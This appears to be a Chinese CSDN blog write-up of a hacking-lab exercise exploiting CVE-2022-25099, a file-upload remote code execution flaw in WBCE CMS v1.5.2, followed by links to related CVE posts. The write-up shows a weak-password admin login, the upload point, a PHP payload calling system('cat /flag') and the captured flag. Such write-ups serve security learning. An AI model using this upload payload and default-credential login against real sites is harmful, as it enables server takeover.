春秋云镜 CVE-2022-25099

最新推荐文章于 2024-06-13 20:22:51 发布
最新推荐文章于 2024-06-13 20:22:51 发布
阅读量174 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131517506
版权

春秋云镜 CVE-2022-25099 WBCE CMS v1.5.2 RCE

靶标介绍

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE

启动场景

在这里插入图片描述

漏洞利用

打开首页提示网站正在建设,随手/admin跳转登录页面
http://eci-2zebhcoic1xyruwapftd.cloudeci1.ichunqiu.com/admin/login/
在这里插入图片描述
admin/123456弱口令登录成功
在这里插入图片描述
寻找上传点languages/index.php,“Add-ons”–“languages” 上传冰蝎马,失败。
在这里插入图片描述
上传phphinfo成功,<?php phpinfo();?>
在这里插入图片描述
那就直接system执行cat /flag

<?php
system('cat /flag');phpinfo();?>
?>

在这里插入图片描述
得到flag

flag{6c6dfde2-f367-4424-b6c8-bf37f968b622}

在这里插入图片描述

isbug0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WBCE CMS安全漏洞(CVE-2022-25099)
千寻的博客
12-09 2296
WBCE CMS v1.5.2的` /language/install.php `文件存在漏洞,攻击者可精心构造文件上传造成`RCE`
CVE-2022-25099
龙狼刺的博客
06-25 434
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
春秋境:CVE-2022-25099
一只爱吃橙子的羊
12-01 1235
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
WBCE CMS任意文件上传漏洞(CVE-2022-25099)
weixin_68999845的博客
07-21 1061
WBCE CMS 存在安全漏洞,该漏洞源于 /languages/index.php 中的漏洞允许攻击者通过精心设计的 PHP 文件执行任意代码。源码下载url:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.5.2.zip。上传路径为 /admin/languages/install.php,在post body部分可以看到明显的恶意payload。1.按照源码下载:https://github.com/WBCE/WBCE_CMS。
春秋境:CVE-2022-25099(文件上传造成RCE)
m0_65712192的博客
04-22 967
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
春秋 CVE-2022-4230
qq274575499的博客
05-07 886
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋 CVE-2022-22947
qq_22002773的博客
07-18 330
春秋 CVE-2022-22947
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
春秋境】CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
果粒程
12-01 685
春秋境】CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
制作安全科普馆设计方案时,哪些安全细节不容忽视?
qq_2129354861的博客
06-12 294
在数字多媒体技术的浪潮下,创新的展示方式不仅引领了展厅设计的革新,还为知识内容的传递带来了前所未有的高效与便捷。不同类型的多媒体互动装置,让展厅的展示形式变得多样,我们为了确保展示内容更加明确和有条理,就需要对内容展示区域进行划分,而根据不同的安全主题,便是安全教育馆常用的方式之一,例如按照交通安全、消防安全、网络安全等类型的分类,可以将展示区域划分为不同的主题区域,再针对不同的内容版块,来选用适合的多媒体互动装置,使观众能够更快速地找到自己感兴趣的内容。
厨房燃气安全新保障:红外点式可燃气体报警器的作用
BDjiance的博客
06-13 487
与传统的可燃气体报警器相比,点式报警器具有更高的灵敏度和更快的响应速度。通过实时监测空气中的可燃气体浓度,并在发现异常时及时发出报警信号,它有效降低了燃气泄漏和火灾事故的发生概率。同时,红外技术的应用也使得报警器具有更高的检测精度和更快的响应速度,为家庭安全提供了更加可靠的保障。例如,在某小区的居民家中,由于燃气灶使用不当导致燃气泄漏,幸运的是,家中安装了红外可燃气体报警器。其中,燃气泄漏和火灾是厨房安全的主要隐患。近年来,红外可燃气体报警器因其独特的点式报警和红外技术优势,逐渐成为厨房安全的新守护。
【安全函数】常用的安全函数的使用
最新发布
weixin_54954007的博客
06-13 671
本文章描述常用的不安全函数与对应的安全函数的使用。不安全函数原型参考。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 566
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
软件安全测评有哪些测试流程?第三方检测机构进行安全测评的好处
卓码测评
06-12 438
在今天的高科技时代,软件产品已经成为人们生活和工作的重要组成部分。然而,与其普及和深入应用的,软件安全问题也日益凸显。
46-3 护网溯源 - 溯源报告编写
weixin_43263566的博客
06-09 344
在这部分,需要详细描述钓鱼邮件的基本情况,包括收到的邮件内容、寄件人信息、邮件附件或链接等。还需说明收到邮件的时间和频率。
CVE-2022-32417
03-29
CVE-2022-32417是一个公开的漏洞编号,用于标识软件或系统中的安全漏洞。根据您提供的编号,我无法直接提供具体的漏洞细节,因为我无法访问实时的漏洞数据库。但是,通常情况下,CVE编号可以用于查找相关的漏洞报告和详细信息。 如果您对CVE-2022-32417感兴趣,我建议您通过以下方式获取更多信息: 1. 漏洞数据库:您可以在公开的漏洞数据库(如CVE官方网站、NVD等)中搜索CVE-2022-32417,以获取有关该漏洞的详细信息。 2. 厂商公告:如果该漏洞影响了特定软件或系统,您可以查找相关厂商的安全公告或补丁说明,以了解更多关于该漏洞的信息和解决方案。 请注意,由于我无法直接访问实时的漏洞数据库,因此无法提供具体的漏洞细节。建议您在查找相关信息时,确保从可信赖的来源获取,并遵循相关安全建议和最佳实践来保护您的系统和数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值